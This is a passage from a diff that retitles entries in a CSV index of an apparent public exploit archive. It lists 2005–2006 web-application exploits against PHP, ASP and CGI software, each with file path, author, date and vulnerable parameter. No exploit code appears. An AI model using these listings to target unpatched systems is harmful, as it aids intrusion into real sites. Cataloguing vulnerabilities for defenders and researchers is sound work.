Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 +1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 @@ -16629,7 +16633,7 @@ id,file,description,date,author,platform,type,port 1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,php,webapps,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 -1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0 +1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0 1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution",2005-07-25,newbug,cgi,webapps,0 1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps,0 @@ -16658,13 +16662,13 @@ id,file,description,date,author,platform,type,port 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 -1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 +1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,php,webapps,0 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,php,webapps,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,php,webapps,0 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,php,webapps,0 -1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) SQL Injection",2005-11-02,Devil-00,php,webapps,0 +1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - 'm' SQL Injection",2005-11-02,Devil-00,php,webapps,0 1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - Shell Injection / Remote Command Execution",2005-11-03,rgod,php,webapps,0 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0 @@ -16674,8 +16678,8 @@ id,file,description,date,author,platform,type,port 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0 1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - (msg/forum) SQL Injection",2005-11-16,rgod,php,webapps,0 +1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - 'TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 +1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,php,webapps,0 1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 @@ -16726,10 +16730,10 @@ id,file,description,date,author,platform,type,port 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 -1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - (title_op) SQL Injection",2006-02-14,x128,php,webapps,0 +1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps,0 1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 -1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0 +1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,php,webapps,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0 @@ -16849,13 +16853,13 @@ id,file,description,date,author,platform,type,port 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - 'function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 -1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 -1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 -1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0 -1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0 +1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 +1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion",2006-04-28,[Oo],php,webapps,0 +1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0 +1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0 1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps,0 1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 @@ -16880,10 +16884,10 @@ id,file,description,date,author,platform,type,port 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - 'rf' Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - 'rf' Remote File Inclusion",2006-05-08,ReZEN,php,webapps,0 1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 -1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0 -1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 +1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0 +1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 -1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 +1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 @@ -16926,9 +16930,9 @@ id,file,description,date,author,platform,type,port 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0 1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0 1843,platforms/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 -1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0 +1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion",2006-05-28,nukedx,php,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0 -1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 +1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 @@ -17099,7 +17103,7 @@ id,file,description,date,author,platform,type,port 2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection (mq=off)",2006-08-01,rgod,php,webapps,0 +2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection",2006-08-01,rgod,php,webapps,0 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,php,webapps,0 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 @@ -17222,7 +17226,7 @@ id,file,description,date,author,platform,type,port 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2268,platforms/php/webapps/2268.php,"e107 < 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0 -2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0 +2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0 2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps,0 2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0 2272,platforms/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",php,webapps,0 @@ -17238,7 +17242,7 @@ id,file,description,date,author,platform,type,port 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 -2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 +2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 @@ -17295,7 +17299,7 @@ id,file,description,date,author,platform,type,port 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 -2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0 +2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,asp,webapps,0 2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - (script_path) Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Local/Remote File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 @@ -17328,9 +17332,9 @@ id,file,description,date,author,platform,type,port 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection",2006-09-19,x128,php,webapps,0 -2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 +2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0 -2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0 +2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0 2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 @@ -17338,7 +17342,7 @@ id,file,description,date,author,platform,type,port 2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 -2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 +2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -17391,7 +17395,7 @@ id,file,description,date,author,platform,type,port 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Inclusion",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps,0 -2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0 +2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0 2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 @@ -17460,7 +17464,7 @@ id,file,description,date,author,platform,type,port 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 -2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 +2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 @@ -17472,9 +17476,9 @@ id,file,description,date,author,platform,type,port 2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,php,webapps,0 -2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0 +2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,php,webapps,0 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0 -2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 +2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection",2006-10-16,w4ck1ng,php,webapps,0 2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 @@ -17557,14 +17561,14 @@ id,file,description,date,author,platform,type,port 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,php,webapps,0 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0 -2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 -2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 +2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0 +2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 -2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 +2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - 'themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 @@ -17594,7 +17598,7 @@ id,file,description,date,author,platform,type,port 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 -2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion",2006-11-06,ajann,php,webapps,0 +2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,php,webapps,0 2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 @@ -17733,10 +17737,10 @@ id,file,description,date,author,platform,type,port 2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 -2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 +2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote File 